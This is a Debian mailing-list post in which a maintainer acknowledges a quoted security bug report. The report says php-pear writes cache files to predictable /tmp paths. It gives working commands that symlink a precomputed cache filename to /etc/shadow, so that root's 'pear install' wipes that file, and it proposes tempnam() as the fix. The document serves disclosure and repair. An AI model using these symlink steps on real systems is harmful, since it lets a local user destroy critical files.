[php-maint] Bug#759282: Bug#759282: [php-pear] "/tmp" symlink file clobbering

Ondřej Surý ondrej at sury.org
Tue Aug 26 09:20:14 UTC 2014


Control: forcemerge -1 682157

Yes, it's a known bug that php-pear is not safe on multiuser systems.

Ondrej

On Mon, Aug 25, 2014, at 21:28, vladz wrote:
> 
> Package: php-pear
> Version: 5.4.4-14+deb7u14
> Tags: security
> 
> PEAR commands such as "pear install [...]" writes cache data into
> predictable filenames located in "/tmp/".  Unprivileged local users
> could use symlinks to clobber arbitrary files.
> 
> Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
> the code above.  They are predictable as far as we know the extension
> name that is going to be installed (this name is used to construct the
> url for the MD5 checksum):
> 
>     $ cat -n /usr/share/php/PEAR/REST.php
>     [...]
>     59         $cachefile = $this->config->get('cache_dir') .
>     DIRECTORY_SEPARATOR .
>     60             md5($url) . 'rest.cachefile';
>     [...]
>     194        $cacheidfile = $this->config->get('cache_dir') .
>     DIRECTORY_SEPARATOR .
>     195            md5($url) . 'rest.cacheid';
> 
> For instance, when installing the "Mail_mime" extension, the following
> filenames are used by PEAR:
>   
>   - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
>   - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid
> 
> In this case, the "$url" used for md5 checksum is the following:
> 
>     $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
>     ff051dc5b96c95bf60e300d415b6c47e  -
> 
> To sum up, if a local user wants to clobber the "/etc/shadow" file, he
> runs:
> 
>     $ mkdir -p /tmp/pear/cache/
>     $ ln -s /etc/shadow
>     /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
> 
> Then when root runs PEAR, file gets clobbered:
> 
>     # pear install Mail_mime
>     [...]
>     # du -sk /etc/shadow
>     0       /etc/shadow
> 
> A function like tempnam() could be use instead.  It creates file with
> unique filename (see http://php.net/manual/en/function.tempnam.php).
> 
> Regards,
> -- 
> http://vladz.devzero.fr
> PGP key 8F7E2D3C from pgp.mit.edu
> 
> _______________________________________________
> pkg-php-maint mailing list
> pkg-php-maint at lists.alioth.debian.org
> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-php-maint


-- 
Ondřej Surý <ondrej at sury.org>
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server



More information about the pkg-php-maint mailing list